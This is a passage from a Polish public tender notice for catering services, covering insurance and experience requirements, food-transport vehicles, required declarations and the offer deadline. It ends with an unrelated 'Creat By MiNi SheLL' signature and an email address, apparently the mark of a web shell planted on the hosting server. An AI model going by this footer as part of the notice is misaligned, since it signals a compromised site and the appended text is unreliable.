określa szczegółowego warunku w tym zakresie;<br/><br/>1.2.2 uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o ile wynika to z odrębnych przepisów: <br/> Zamawiający nie określa szczegółowego warunku w tym zakresie;<br/><br/>1.2.3	sytuacji ekonomicznej lub finansowej:<br/>Wykonawca spełni warunek jeśli wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności, związanej <br/>z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 300 000,00 zł (słownie: trzysta tysięcy złotych.<br/><br/> Spełnienie warunku opisanego powyżej będzie oceniane na podstawie Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu oraz uzupełnionych na wezwanie dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/>z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.<br/><br/>1.2.4	zdolności technicznej lub zawodowej<br/>1.2.4.1 Wykonawca spełni warunek jeśli wykaże, że :<br/>a) przez okres ostatnich 3 lat, przed upływem terminu składania ofert a jeśli okres prowadzenia działalności był krótszy – w tym okresie wykonał przynajmniej jedną usługę cateringową o wartości nie mniejszej niż 600 000,00 zł, brutto dla średnio 150 osób dziennie, przez okres nie krótszy niż 6 miesięcy (przy czym Zamawiający uzna tylko te zamówienia, które miały charakter ciągły, a nie okolicznościowy), której należyte wykonanie będzie potwierdzone stosownymi dokumentami (np. referencjami). <br/><br/>Spełnienie powyższego warunku będzie oceniane na podstawie oświadczenia Wykonawcy o spełnieniu warunków udziału w postepowaniu oraz wykazu usług wykonanych,<br/> a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, <br/>w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych, referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy, licząc wstecz od dnia w którym upływa termin składania ofert; <br/><br/>b) dysponuje przynajmniej jednym samochodem dostosowanym do przewozu żywności, spełniającym wszystkie wymagania określone stosownymi przepisami;<br/><br/>Spełnienie warunku opisanego powyżej będzie oceniane na podstawie Oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu oraz uzupełnionego na wezwanie wykazu środków transportu, potwierdzającego że pojazdy którymi dysponuje wykonawca są dopuszczone do przewozu żywności, potrwierdzonymi stosownymi przepisami prawa np. zgodnie z decyzją / zezwoleniem właściwego Państwowego Inspektora Sanitarnego na podstawie Ustawy z dnia 25.08.2006 r. o bezpieczeństwie żywności i żywienia (tj. Dz. U. z 2020 r. poz. 2021 z późn. zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz <br/>z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – wzór oświadczenia określa załącznik nr 8 do SWZ;<br/><br/>2)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia określoną w Rozdziale VI ust. 1 pkt 1.2.3 SWZ tj. nie mniejszą niż 300 000,00 zł;<br/>2)	wykazu usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat, <br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy usługi zostały wykonane lub są wykonywane należycie - wzór wykazu określa załącznik nr 4 do SWZ.<br/><br/> Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych, referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>Powyższe dokumenty mają potwierdzić spełnienie wymagań w zakresie zdolności technicznej lub zawodowej opisanej w Rozdziale VI ust. 1 pkt. 1.2.4.1 lit. a SWZ;<br/><br/>3) Wykaz środków transportu do przewozu żywności wraz z zaświadczeniem stwierdzającym spełnianie wymagań sanitarnych przez środek transportu, którym będą przewożone posiłki, potrwierdzony stosownymi przepisami prawa np. decyzją/zezwoleniem właściwego Państwowego Inspektora Sanitarnego na podstawie Ustawy z dnia 25.08.2006 r. <br/>o bezpieczeństwie żywności i żywienia (tj. Dz. U. z 2020 r. poz. 2021 z późn. zm.) - warunek z Rozdziału VI ust. 1 pkt 1.2.4.1 lit. b SWZ); wzór wykazu określa załącznik Nr 7 do SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1)	Ofertę wraz z załącznikami; ofertę składa się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej elektronicznym podpisem zaufanym lub podpisem osobistym.<br/><br/>2)	Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania – wzór oświadczenia określa Załącznik nr 3 do SWZ;<br/><br/>3)	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców (np. konsorcjium, spółka cywilna) oświadczenie, o którym mowa w ppkt 2 powyżej, składa każdy z wykonawców ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/><br/>4) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w ust. 1 pkt 2) powyżej, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, <br/>w jakim wykonawca powołuje się na jego zasoby- Załącznik nr 3A do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez wykonawców (np. konsorcjium, spółka cywilna) oświadczenie, o którym mowa w ppkt 2 powyżej, składa każdy z wykonawców ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu; <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści umowy, zawarte zostały w projekcie umowy stanowiącym Załącznik nr 5 do SWZ. Umowa zostanie uzupełniona o zapisy wynikające ze złożonej oferty.<br/>2. Wykonawca akceptuje treść projektu umowy na wykonanie przedmiotu zamówienia stanowiącego Załącznik nr 5 do SWZ.<br/>3. Zamawiający przewiduje możliwość zmiany umowy. Postanowienia dotyczące dopuszczalnych zmian umowy zostały określone w projekcie umowy stanowiącym załącznik nr 5 do SWZ oraz <br/>w art. 455 ust. 1 pkt. 2,3,4 a także w art. 455 ust. 2 ustawy Pzp. <br/>4.	Wszelkie zmiany Umowy wymagają zachowania formy pisemnej pod rygorem nieważności. <br/>5.	Wykonawca zobowiązuje się powiadomić Zamawiającego o każdej zmianie danych i stanu faktycznego mających wpływ na realizację Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-29 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1.	Oferty należy złożyć za pośrednictwem Platformy pod adresem: https://platforma.eb2b.com.pl lub wci.eb2b.com.pl przy użyciu zakładki „Załączniki” w terminie do dnia 29.07.2022 r. do godziny 09:30. 2.	Oferty zostaną odszyfrowane i otwarte za pośrednictwem Platformy w dniu: 29.07.2022 r. o godzinie 10:00.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-29 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com